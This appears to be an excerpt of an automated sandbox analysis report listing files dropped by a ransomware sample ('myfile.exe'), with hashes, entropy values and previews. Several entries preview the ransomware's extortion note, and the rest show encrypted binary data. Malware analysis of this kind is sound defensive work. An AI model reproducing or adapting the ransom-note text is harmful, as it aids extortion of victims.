                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.841348377246714
                                                              Encrypted:false
                                                              SSDEEP:24:R0TqSbz2XXVkSB0e9hmVCOTcWfzhrkKJOrdK8nrMMjiEbZSR:R0f2HVyRTcgyKJkMoXsR
                                                              MD5:A21D52E26B4801168B5B438AE44BD654
                                                              SHA1:BD5FF450EE065909252185B7A06A3F4EEF0B2663
                                                              SHA-256:E8CD23079F1F3E1702C124C34836CDD6EB6CD538CEEE36AD670A74C1C1A67EC8
                                                              SHA-512:BEC5B1A889BC9625F39EF1D1CCCBB776CD22D081CA112EBFBFDF10CC60CA095715DFA17B14805D3EF2C67E12AEC85CBFB6F61B868FCDF05176844E5F172B0A0C
                                                              Malicious:false
                                                              Preview::.h.60..."=..7.....(ss.D.W.W...z.n...S...la....`nU...I..>.....9~O.E.&...\...&.P.Bn_A....K9...>.V..o..n..$l..&<.Mn.9l.F.8t.r...<I.7...Ys.....G.M.A`{q...)..CI...&.{....?.)w.t."@7~..\...^....f+di..lF&`/op.v..S...I2...>.....'..%...."..t._.7.-.z.L+.z....@...v.....s5{..3..Oh.......'.n......Y<.}.}.....r...x..e..%q^.#..4.<8D..i."L..P..r..|..Z....Sq.I......&..j.oY.....Q..A_..Y..H.}S..^.."+....E..a.H......"......h.......P..+` W.{.-..-.,..8../.j...0.Izm.,B...j=.X.~..rnsu<.T...`3T..}Y..(.(p..5.Q>jJr.zX/..".%.....Ir1P....32........F.J....h...........D?>Y?....%...#......2S...*.6fD:.O..!...0qA......0Dk..m.U|.fWa2E.Kf.#..]....*}...+..DF*....../...:F....m.9...x.L.....Q...CKN.@.7M#...Sct..p.Ns.5......OW.}..p7.....y.xxX.5%...i.IcD..(#j..,r......-.%......+.^.~F.B-\:!3. ..N1f.~.....?.s.O.y.hL..p9z........>F....V.......CT....`|...k.Y."..sQ.kc..Zm@,Q6.-.$.}']..o.@........)...e;........lH_V....(.K....F..A.@..:+5w..i.L.9%.^....>.....Z..1...g......;.#kx?xl....[.....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:OpenPGP Secret Key
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8652450668130784
                                                              Encrypted:false
                                                              SSDEEP:24:JXDIoSn40AgFaDh4DiNwqYN/pL0Oo9TAmHwDdfICaGJAVnrMMjpj:JTqbAg0K5hNZotAmEf/JAFMoJ
                                                              MD5:3E35FB55B879BFA83170D90D3A63E032
                                                              SHA1:5109F78DC5B372BB134D8F6757BFE42DC7819F13
                                                              SHA-256:A70F9A1394E92213D0A04D5059E022D149BFB158BB8458DE83E54BDD61FD5077
                                                              SHA-512:8C5BDB81F217A925093D78862E3BFDB4954454E3FB91D9FEA4C842643E7844032EC220E7EF2838A9548754390EB638A5988431803ED314DEBFEB5612776E8CB0
                                                              Malicious:false
                                                              Preview:.sp......1.9./.f.:zy0........u.X..@D.,....&..}...Z5.5.\.Jj..7.z...;X...+TG..4...pU.!4..K.a?........}4. kd.0.@...zQh......QH."o.!..T...8..{.R.4.8........H.@YH.Q..3.....VO..|.B.^...![F.8.^.!.h+E1.IP.4.S.h.........T*.@.8p..[..@}{b..&$....\..;....Z.W.D...kUu...vv..aZ.eX.z....z..4..0...<.........p,.I./.y.r....Lq.....H...vI....:.z.x.*w.8..g..{9UT....`.,......n.O.%2.?{....)$..|.l...Ch..cs.....AE&5....X.(;R.3..j.....e%.eU.Z......?....../.O.....6...vo.A....(G:.B..N/T.V....37>......D..Cw5.y.....gr.0.58.../.>..Bg.gC...]..o2..{.<9..F...P..>.....pd....?q.~...R"F.".[.y.?...)Nb.s..z,.`.....s.o.j...7R.....^....h.c.K...g .}.z.@....n.Jc.W|...M....G.. .L.8......`.-.3..\..>.V.{.1;......1.z"~W..*V.f..|....d.."...(...=.M+n/.~..<r.....p.5..t....Px.y..?.f.F..6.d..$./..Z..4.....8..m..-l..4:.1......I.....5..vZl.."z....9.fJ.]...<.S...*...l.......~b|.].......t.....3.bf.X4....Q...u(..<r..,5HF.[G..W..W..Si.K.F.Mn.X._i...N..HCv.2{R.9a.qB}.K(.3.S``.+....>....q_v..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.847121315789624
                                                              Encrypted:false
                                                              SSDEEP:24:ROgAJ5H5jQtGTzRNCa+E2dd897OaW+o3SnrMMjQV:RY5ZjsqRL8D8g3UMo2
                                                              MD5:CE2F68F0A036E4228BDD12D97E307989
                                                              SHA1:C7022DAEA490F982A003499646214344F91F7EE3
                                                              SHA-256:DBAB0A777EFEE8FC46A097B2E8E1D25703F252D7F991A8C2B318B989612FE074
                                                              SHA-512:D27D38755F94DC4CA3AF07518EC0E6F01853CB1C8A10D8A207BCD1214E3DF234E32D8C76A28505052E206DAA6562648007640907E6CB2BD783D57DAA8DF553BC
                                                              Malicious:false
                                                              Preview:.~DWy..M.g..J&=.^.n9EHBsn...k".na[w..L...+.....a..N.z;c..WL.b?.bWp..?/.%.W.....\...r.z@.e.....8>=\..q6q......4.%.^..2}:..b.T.Yy.\.Z.0..N...X.+_=....T....a...Q.P.%*.....]_V.Vr)....r...W.n_....qg.qn../..2.BU...a.9.4...g...l.%p.....=t.. CKPn.T...............$.../.o.;..k.....k...]VY'.3.M.Y=]G..'9k.m....6.cj.,.Z..G...[.....Z....+....D.|!.ZT6.g...,.T<.3.?.v.Z.r......8!.Cf..=....t:..I.j.....,.St..e3........_.,.=O.....{./5...0..>.P.o.BTb..l...x5......0...e..%k.z.8...._H.&.U!....~...=t..<F.O.!...@-..$............U.t.'.>..`c.x..J.l................Z*}E..)....x.W./I..l{...].....D....wkQysp*.../A.J.....yR$.4......h.s.M.{}/I-.>.....OX.....R..]....Q~.K.ZT...r....:.....u.NT.]h.R......o..A.2;.u..Y.J.Zl:..k..`.p.0..Gk......<...VJoP. .j1;...{."..O.b..&V..%m....>0...of.[`Y>i[B..j;..R......y/f..s.......... .f.."_..3.v.R.U.<..BiU..fn..P....S#4..O.E...d.<.a:x....n9..No.N..,.........3...Z.8..o..2h.&...q/n.j#...B.v_a.....J!....Z..]t.2..}c.2........1.e.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.846066783706628
                                                              Encrypted:false
                                                              SSDEEP:24:XrAv49X2YFyH6jcApbMINwxDqeZM70PV4ZLLjR5QgEelxBCqzIS9nrMMjJG3lX:i4TxlpwINwZqeCEV4RLnlTCqzIoMow39
                                                              MD5:F49D53B5526831E6AE697742B7673798
                                                              SHA1:749E27E02695CB21EF0F47DBC83E3613F8A0C134
                                                              SHA-256:3213C2E505FE70C82C1941994CDE83D3FD193B302CEE219129B687E23DCB3E3F
                                                              SHA-512:1449428D8B606168996077CD5F3C91F7A71C0144534ABAE780EE25E15E43EED38234BDDAF59B51CA3A377B4A56C6836DF2C9FA896F582B683BA5C706557BEFB7
                                                              Malicious:false
                                                              Preview:....,...i.[+. T....E.v.....u{.[.Q~..B.U_..hqYY+...4j..E...."e..8L...# .s.e..9.?.....E..Zz.k..6u..V.VMb...dMM.p._6.....M..{%.k.4..F.J+V.}6oq.g...Z..q&/g.....m.Z{\7...#^....^.O7..?...z......,....me...4.|.G..*.Xa.....A....9..r...w...m.3.|.Wf.......b...^SP\.5./u...m..P..e..rh...t......6v..w[<v..;t..#..,...r.y.m.(!...J.L.,._L....7.:s.5[H.[...x.N....W...("Fno&W|......[O.....g.....X.s..,...V?.<..1........>v+...=t.W.P9.b....:..!l... ..a..V..A.L....u.j.i............$.P.t..].K.<..C..2...#......1.KIZ..@P?..s...^8....*...@V.x.../..f..(.....ON.&.4...Q.a..h..w..n-...*L."..e..L.=...Vd@}.\.?.~.....<...}'.-.v..u.`.S....5@...?.~.:.......-qC-..yi,..c3%...0f.Q...U..T.5..Or!...s...S..TI..mV..i.._Qy.=.L=..3..4....9.74.An.|......2.r*..k.(..w.....O.2..,.;5..g...h ....V.g....z.0..E..h.+...x.....).....[.a9;jHs.0.?...1.....Lu.\...,..2!u>......&Vp.`:...R....=.d~...<....I....'>`.X..,. 8.%.p6`F#..G!.1.c[jQ.7,.<....c...}.6.v.D.mB(..?.'.U......A.nk..U..6a.j:Y.^.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.823725419061911
                                                              Encrypted:false
                                                              SSDEEP:24:5Ii6xYivqkrU5LO8sguQE+r2qxWPOVG5yThZ4qTXC3nrMMjhx:H6i/QUhOKuQwqxWPofNTXC7Mohx
                                                              MD5:0EE15182AD30A85FF9F4372B92FB48B5
                                                              SHA1:9D51F4BCCE7E922CF4BC6AAC3E93A0DEE6844AC1
                                                              SHA-256:4ED6F0E57DE78431C6FEA60974DE244B77876F320015E9855C3AC9AE0F28B27C
                                                              SHA-512:F0139C91425708CA99524C01516855EDF63059DF87F15B3424B82AB64D40E7DF649C4FEAE1EB76A7CE4A5326EC7BCE3D979A105C985273F6C52D544419C37B3D
                                                              Malicious:false
                                                              Preview:R..`n.oq..5.... ..E.1[..#..\.W......b.......M..s6...Q.6..=.nh.R..:.&D.`..x.jC.....H._..IE....<."O71..Ut.5...(.f..."....8.ci.B.k..F.,?H..l.m...nCC.5]+..J.MZ.D...=.......7.."A8....|...CG.Gf...r...w.VH.R.m'....M.qJ...S.....:{%>.....B`.....m...QY.......X....Z.D.6...Px.8..]....*."@X...;.H.....~2.......w..k.=]A....`)..{u.H.....y([..'.....Tc....E@U..y....e.U.^n.`..1I.......@..a..%L.+.l).J.Ne..q/.Y...l..0..N).M...S.X..A....Y......2.v.U..q(y.;.......E.w....0.1..I...R..$.k3...%_uDx.....p.......;<.9|.<..h....0.~ ..Js.....-..x......../....2...i-...mR.......9y.*.,.%N...ZS.l.|N].=.d...9WI..c....b../j/..1.tN.|\e~..}.u.a.}I.2.?}..Y.fyo:..VGM..>..k..k....E\Y.`:...V..(.:...\+..wpb .e...Z.\..e..S....|Yy.C........K2.|.E.-.i.vU....ktv.A.;.8...o.$o...2....\._...p...q;..`.g7."...#.I..8$W.......t.W.r3.67.M.if.P.@.....H3y1..g.qk..3........S%..l........PR..m..h<.o.......x.9:..<......Z...b.=|.6MNr6.0.Z,.*.W-.5*-.;D..|...9B@t.j1m.,-.Tw..b*Vd.o.D...r/..F...A@i
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.850429923319102
                                                              Encrypted:false
                                                              SSDEEP:24:rxnc1a2/Rkj5mhTNtM4uX2rF4tCbonzh4Tu5ETnrMMjnj:rxuhuj5m1NC4umrF4ty4uuwMoj
                                                              MD5:1B2F10DF36231B9086211277418381D5
                                                              SHA1:7AF5EBDBB9EC1E0146C635B117A88735AB568C7D
                                                              SHA-256:543F14E789CD766C82E17CB22ECAA441863B19C93F447335DD672FA84D5BB3B8
                                                              SHA-512:5763E2CB01B91FA4BA0A65B92B103EDDD918D735739821D4133AFBC157517BE83CC8DCB88DC6E2B834D4A14BDDD2824DA4D07777A77A699F8333E03FFA2BF4BA
                                                              Malicious:false
                                                              Preview:eD[.]j.9.......Pd....8.{....A.OM\.L.:b....rU.....{./......7.;.'.@.M........F.=p..^3*...]U..K._...(.7e.._.E.j.u.%...]jl..;.nQ.sc..59..5..cL`Fp.@B..=,...(.x......0.S..4...............F{.$A1..t&...O8....2.y..F.lk.;.&s.x..}..h]^V.Q.c..1Z>|.2...f....%..L.r.Y.:1.@.....{.l.2.,.y.._..b.r..-..dR....).J.......2...$..&...?.=i.y....3'K6,..f..L.j...H...7.~~N9..*0F."*.R....["..F-@.....U..I.i.B.lt.T..pN..!..Ov.U.%...sH^...Y.......).*f.1...@/.n.|..:.@!...u....f9b.....z.......0...K.*<-...sZ..O.=-.._4CXPt*A.b..MP..CDV.W;M..6/a...4.8.D)Sc....k.G'.[..4[..+Y.....U9..z...R.g}U..E..q..M.RK......V.E..g..Y ....R9.SQ@0..N..pgV...p....v...)...D.V....V..&..vR8..^......u+wh..].^c..........B...M4.M,.8.1.7.E...W.\..~_....y[N.......c.K"...`...|#:.T...7..s.~>]..r..|.. .....(..=.|.....ID,.``.....zc....7.V.l.S."...@...p...&F.". .*l......B.LS..W...1b...C..b....G..L.K..ZF.Z..5/q$.j....c.~QDg..jUz...Q....u'...(...y....M...c......1.0T..;.b.E.'._g.@...c.6...w.:r.m..J.<
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8560280579569435
                                                              Encrypted:false
                                                              SSDEEP:24:VZmlbgdQzS2BSxwb5lI8XdfySTJwcADs134uNN6iSnKlDqnrMMjWJe:VIbgez53tlhsS9aDs1Iu7QK6MoWY
                                                              MD5:04DA3F28EE98C169351009B2BC26C806
                                                              SHA1:01A5C7534C0B300C224B87F2254DD4FF188C87B1
                                                              SHA-256:D5EE8FC7D3EFE41542353AD3F1AFF64C517C04F2D0590D23FCA48F43F255F245
                                                              SHA-512:D192250BBE2653D2BBC06C2381FF81D96642987F49247E75D6C82B1895C3D307D0579E9A37BD338A0B715AF65DFB9A84FB8BEEA25F8ADA5AEEFF0E1D0052F21B
                                                              Malicious:false
                                                              Preview:.C..@..a...k...Uj j...,...S....n....W.s.zK..t.3.*..y.u.6|.x."..@=.f.`..gA........-.!.....r..:u.H...<....7.),..Klz.[.*j;%C.f/.{7...`.rPQ28w.M.R..'....D.Kp...t2Tj...X.\.58[.a....k....1.^....[(..d.. _j.6 ..2.......Z.5.........UDD3^.F..1.1..@'.f:.4.p.....4g.5g-.".*(?.x...Z..6AG...^.WE..0i(.....n..U\..F.......C..-.9..@..6..M.m.j(.MES...c..u[::.M..a>U.h.!...U....Y.zr...w.......=[..)...<qk...H`#"...yM..&.R..-..2..X-#.s.5...._..D...A.,....u"...._.z.z4....@..S...?..]......._.vA.....%..g.+.e....'...]..^..|:Cq..2.X.}8.n..BL..8:...55...{j....C...w.....H..R.o^c.e.r(O..F.)...6.S..4.E......Zy..f..sWI......8...FA.....8......Lq.-d.....N.).1....[.#.y...Ug.9>g..}..oHfk....n...>f.U...............d.<.U.....?=.....>..F.PL.pN.dS.m...\^..fa.'...p...I..<(...j.B.N\2TE2.Q5.iTG.'.p..../.([.*.%.-Q..1..U.789^.tV..tTS~....\N.....*...3....q.v.....O8.bix.!U.?..$....K...0!...\...%.q.%.......y....5.J.7R.{".z6N....cU@.....A...Dh.......?W.. .L\....dS.o.....h....d..1.9
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.831293180637031
                                                              Encrypted:false
                                                              SSDEEP:24:xmmQFSxV6w5oJ+MpI+T1un3/6hZeUPZDN5uR0VyHHUUzoXhnrMMjogu:Mfa75hMq+B4yh1PZXyHH/oX5Moov
                                                              MD5:559227E2F98B96F962A97D3DDB3732AD
                                                              SHA1:83521E79B0B76EA66F4E9EDB5D45452B9780F513
                                                              SHA-256:6348C4E5B91280E1F285E5DE8E16F41775B464A4407DDAD2D5F2D59D844B725C
                                                              SHA-512:A22454F0B66C85DB40CE0021A02B37256B23F05D59B99BB84D9E89BC82F47B9243843CD17CEBE596C763A09FF879A4A503ED645F1E44D74563C4446C6C17FD4B
                                                              Malicious:false
                                                              Preview:.L..^#d.....-uL.MR...Lf...0(..9..{...n.aSj....z.j..!.o.?...i.t..:^...@0M..j.r..,..-..M2.I..f.`..L...}.\.n..-p.>RT~...}...[...y,`..e....i....g.).uW...U.[...JM......i.C.u.....!...-~.)4.?.Bj......~..t.i/.x}....J@}J....,<tng.KJ....]..9..]3..|......f....Y...o.$f...Y.uJ.Q.B.....q...Js.C..o...iJ#e...tA..eH.G................6Z .. ..g.....gq......'Q..E....0gM....z&....K&..Py7M.:.T.Ot....K.".Wcl....9w..O..|d....J...G.)....<..W..u.B....})K........h..g...jW.NJ..-.....mM.FZq..t..%.;.&.j}Zu6Y?.].f......{9r../g..2H.......I.'R.1.P......8..gw.J)...in...[r...^[bYi...o...E......~&...m........R.....o.Q.{.=..<.hN.C..5..l$ ...Z.e.....6..8.........=B....i.3Ee...........y.h........<..ME..Z.[........di....-./.z.mp...N.@.....L.>..*C....R.<.s...3....G.1..(.q....gP_F...R..\...._..@.8.....BG.M.kB..r.[.\9.........nj..W.M6..8.ps6.D.zV.>;.......U^.U/(.?...,.$.s...).r.$_m...}.......rs...'{...K...." ..p.{..b..o.U}.<..x...Vo..9.H8.mt.=....B.8......;(......D3.?.N..u.>0.j}^
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.858742852065726
                                                              Encrypted:false
                                                              SSDEEP:24:+fzVfJXzHSjVCTE2lPkeFlMaCe0BSKbZIPHKH2SmtnrMMjymNf:+b/Xzyh2liFeCcqvsMoymNf
                                                              MD5:B1297D86985E4A690AF9A8C10B43E5BC
                                                              SHA1:B5F198BB281044BDE3A3580B406392E431798603
                                                              SHA-256:F82A8F6451273DCFAA0FA3239E4974E8652AC0F02C3B286C9067981C0640877B
                                                              SHA-512:0B6A129892361F1F76DD61D6D820D621B300A4D47B9D5856302034DDA96039A21F10AE0FE942F3CD77B8DD6F2DFC669020E025EDE82C00928AC059045A48A108
                                                              Malicious:false
                                                              Preview:......8....+.~B:@..9..M(3..oj...0..4....$S..8.&.,.....0.((.4....)....[#.+!..-...S.x....].h8.....,>.oV.Cx...S....q. -........}.v.O.d.B.as4.....h...t..q...^-=.{}..g0....)......2..>...q}.yF...*1!.?a.H..6...O........jd-..<[.>'..G`M....H............)i.M^[.W(.f......E....%.Kz...K..u.+T.k,..+ju]..^e..yG..^....8.!9.V.-..D.._;..... ..j....8R...:...B....^.......Pd.n..k...qw....4.q._Z.oP.}....!%..P"q..c....I..u.q...*j........ .u......h.#.c........9T!..g...uB:a.!.?.....u..h.xC./.-y.2Z...#....].s..G..|z....r:}.'....JA5.].|0!.w..Fv....$..~..Y..0..Q.0E ...,<..42E.K. I.i.1-.TLV.h)s.@4.....IY.T[&.C..r..7.l....-.....9.s..&....-#RT.m.D..A_...?6.<_.....4......0..S.0..{....o.v1.V......tQ...L..wb..w.....I.{.+K...6.5Vmi(..m..<....K#4.n`..&S..P8@~..,.zx...jf..{f..{.+..p...0....>I..'\..P..F..C..Z...N=........L .....a5h...V..3K....mH#........v*. .s.s..1}S#'..#.K#{R||5=.X.V.u...]UfJ..s..TA..t...%....f.BN.8.fG.07GTi.#...1 .F..m.)..M...`.w.+r.......m.6.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.851927465113749
                                                              Encrypted:false
                                                              SSDEEP:24:OXjfn9KDpQPQ18Xo2zNzdx2kxa7zk5US8GYkW6R5W2nrMMjGB:OXD8VYQ18XBJdhM7zfJnuBMoe
                                                              MD5:FA2BE57CDFF0DB685393104F0D3CAA9D
                                                              SHA1:112C3BB2FA4933F422A91E87D236D552D8D4218F
                                                              SHA-256:271892805CC793946303F20078E4DD965797D907C572FA04F86A450AA9BD1624
                                                              SHA-512:FD635C27E2341609CA7CF3A644456F55A9C83D652730458CBBF0512B7F5A68523B8845F04A17B7AECFBB0DE8E3CD6CEE5EEEA9AC37EBE3CD84968EA6AFE1B046
                                                              Malicious:false
                                                              Preview:..d.7{...1%.p....,T~..^.#CK.Ql...:o.$...fU..c.....M.'.[..^n.X.C....5."(.Q}X.b.,..RS9..X.Zzs2......<u..7.....n..s.J.......BO....U.....Pc....c........#.M<..&.d.a..T....z_.~X.'f.2K..-Vw.z.3...At..pb.;....?V....?..L.IF.,+.#....Rl.uV0... ....oj2 .Wo..+..^..M.4&..L..... ..!UH..S\.?...NIp.p.....P.6.........-.0m*"..M]..(_.....@4w..x...a..>...hS4mG.j...@.. ~..A.u._;..h-9....._.r..........GA.....|....<lhw.k.....U......zB#....7..IF....#'.W.qM...z.W...V|q.!O..F.R~(....n.O......8..T.PD)...M?...nV+Z..?D ..O.|.EA+-;.M...7.;..Y....`;(..;..I:i.v.r.sm..C.Tq.|k..-/.?..K..N......j.#.....P.).(......z...1...E....M...'X...1.~v..rU..)Z.>s..U.P_..o......k...%.W.m..v)...?.EUU..+..y..Da.Y..Z.V.dL];.v.P|"..4......w...F......(x...Fa.;.. .HJ.p.?.@P./..W3..E......`g!Z..a.&..."....Q6..w.e.";.=@......h.l.tr....o.E..W...X+...T.'.D... ...g;...g\..b....s.........0..$.`.M....b$..6RL.V...khd..:H..EDA..1..~.?.Q.d.h....fG.5B..+...h.E.wbm...d.r.|.E.,..<&..o
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.871933887101813
                                                              Encrypted:false
                                                              SSDEEP:24:BNDgZ4ft0LKQz1NaZ7yJgjKa7HDmRSlVVTJSIqUYfYDnnrMMjAp:vgZ4V03gR0gGa7jm0ZTJSIqbYPMoK
                                                              MD5:3E89059C1F5B692F5C27BABC9CF9FE5B
                                                              SHA1:357705E39B022E38B60C0633477927D5C4E8AB50
                                                              SHA-256:FF8874D14863DC417FEA1BBAB1935039F5CC0CD7071F13CFF7EA5FA32C1D8723
                                                              SHA-512:33B178FF46E6AC607956935B5DB33597FBF21FC8C118CE8433D9F840817AF9248B9230EC6E6A306B35CFF1DA5CCB63080BC27875A2B884B1DB5F459B3D49E0C4
                                                              Malicious:false
